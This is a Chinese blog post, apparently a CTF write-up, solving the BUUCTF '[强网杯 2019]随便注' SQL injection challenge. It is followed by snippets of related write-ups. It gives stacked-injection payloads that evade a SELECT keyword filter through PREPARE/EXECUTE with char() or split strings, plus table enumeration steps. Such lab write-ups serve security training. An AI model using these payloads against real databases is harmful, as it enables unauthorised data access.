BUUCTF [强网杯 2019]随便注

最新推荐文章于 2023-10-26 10:12:27 发布
最新推荐文章于 2023-10-26 10:12:27 发布
阅读量3.9k 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51412071/article/details/123287120
版权

打开环境后尝试直接提交,效果如下:

根据题目名称猜测存在SQL注入,尝试提交1'

其中,回显报错为

error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

 分析后可知当前语句用单引号包裹,接下来猜解列数。

1' order by 1#    // 回显正常
1' order by 2#    // 回显正常
1' order by 3#    // error 1054 : Unknown column '3' in 'order clause'

当前表中列数为3,接下来利用union查询确定回显位置

1' union select 1,2#
回显:return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

回显显示select等敏感词被过滤,无法进行联合查询。

尝试进行堆叠注入 

1';show tables;#

 

 

堆叠注入成功并返回表名,接下来查询表中列名。

1';desc `1919810931114514`;#

 

 发现名为flag的列,这里要注意查询1919810931114514表时需要用反单引号括起来(反单引号`是数据库、表、索引、列、别名用的引用符)。

此时可以利用预处理语句查询该列

payload1
1';PREPARE a from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE a;#

payload2
1';SET @sql=concat(char(115,101,108,101,99,116),'* from `1919810931114514`');PREPARE a from @sql;EXECUTE a;#

payload3
	
1';PREPARE a from concat('s','elect', ' * from `1919810931114514` ');EXECUTE a;#

查询后即可得到flag

 

Y1Daa
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTFweb强网杯2019随便
12-14
开始入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 :1’;show columns from ‘表名’;# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便
m0_56691564的博客
11-30 2564
该题作者在页面就查了这两个字段的内容,由于该题禁用select,因此我们可以用作者原本设定的查表函数来帮我们查我们想要查找的内容。用rename把words表改名为其他的表名,把 1919810931114514表的名字改为words,给words表添加新的名id,将flag改名为data。大意应该是过滤了select,绕过一下,好的发现绕过不了,不管是编码还是释都不行,因此这个题使用堆叠入。由show的作用可知,words表内就两个字段,一个叫id,一个叫data。
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2246
buuctf强网杯2019为例的堆叠
BUUCTF Web [强网杯 2019]随便
wangyuxiang946的博客
10-25 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [强网杯 2019]随便一、题目简介二、思路分析1)判断入点2)选择入方式3)查看表中内容三、解题步骤1)获取表2)获取字段3)获取表中数据四、总结 一、题目简介 进入题目链接后,是一个「查询」功能,在输入框中提交id,即可返回「响应」的内容。 在输入框中输入一个2,即可.
BUUCTF逆向前八题
最新发布
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
buuctf[强网杯 2019]随便 1(超详细,三种解法)
m0_73734159的博客
10-26 1286
网页环境判断是否是字符型入1'判断是否存在关键字过滤select联合查询被过滤,只能用堆叠入了查看有几个字段正常回显回显报错,可以看出只有两个字段查看所有数据库查看所有数据表爆words数据表的字段爆1919810931114514数据表字段(意数据表为数字的时候需要用反引号括起来);可以看到这两个表words表有两个字段,而另一个只有一个字段。
强网杯 2019]随便 【SQL入】四种解法
weixin_38832257的博客
08-17 1292
题目简介 题目名称:[强网杯 2019]随便 1 题目平台:BUUCTF 题目类型:Web 考察知识点: SQL入 解题步骤 方法一: 首先启动并访问靶机,有一个输入框,随便输入1' or 1 = 1,测试一下是否存在sql入。 提交后提示error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
mysql数据库show的常用命令说明
coujiongyong0208的博客
10-24 174
show columns from table_name from database_name; 或show columns from database_name.table_name; -- 显示表中名称。 ...
[强网杯 2019]随便 (学习)记录
qq_63548648的博客
12-06 192
1
BUUCTF&[强网杯 2019]随便(细节详解WP)
Pysnow's Blog
12-09 4085
这道题通过大佬的讲解,终于把其中一些细节操作的原理给理解了一遍,我们看别人的题解,跟要知道这个题解中每一操作的原理,这对我们的提升有非常的作业
堆叠入之[强网杯 2019]随便
Aiwin的博客
05-26 646
堆叠入之[强网杯 2019]随便各详解
[SQL入][强网杯 2019]随便(三种姿势)
Y4tacker的博客
08-05 8049
文章目录姿势一 ---- 常规堆叠入姿势二---预处理语句姿势三 --- handeler参考文章 前言: 1919810931114514必须用反单引号括起来,但是words不需要,应该是和数据类型有关 姿势一 ---- 常规堆叠入 堆叠入为攻击者提供了很多控制权,与仅限于SELECT语句的UNION联合查询攻击不同,堆叠入可以用于执行任何SQL语句。 首先老规矩输入1 加个单引号,报错 释掉后面大概猜到表的结构了selsect id,data from words where id =,并
BUUCTF [强网杯 2019]随便 1(两种方法)
m0_62879498的博客
03-05 1万+
[强网杯 2019]随便 1 第一步,先判断入点的传参方式,发现是get传参。 第二步,判断闭合方式: 1’and 1=1-- q 1’and 1=2-- q 说明闭合方式为 单引号 如果输入1“and 1=1-- q 和1”and 1=2-- q 两次的回显结果一样,说明闭合方式不是 双引号 其他同理 第三步,判断是否有关键字过滤: 先直接输入: select 查看回显,发现: 发现本题过滤关键字:/select|update|delete|drop|insert|where|\.而且不区分
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值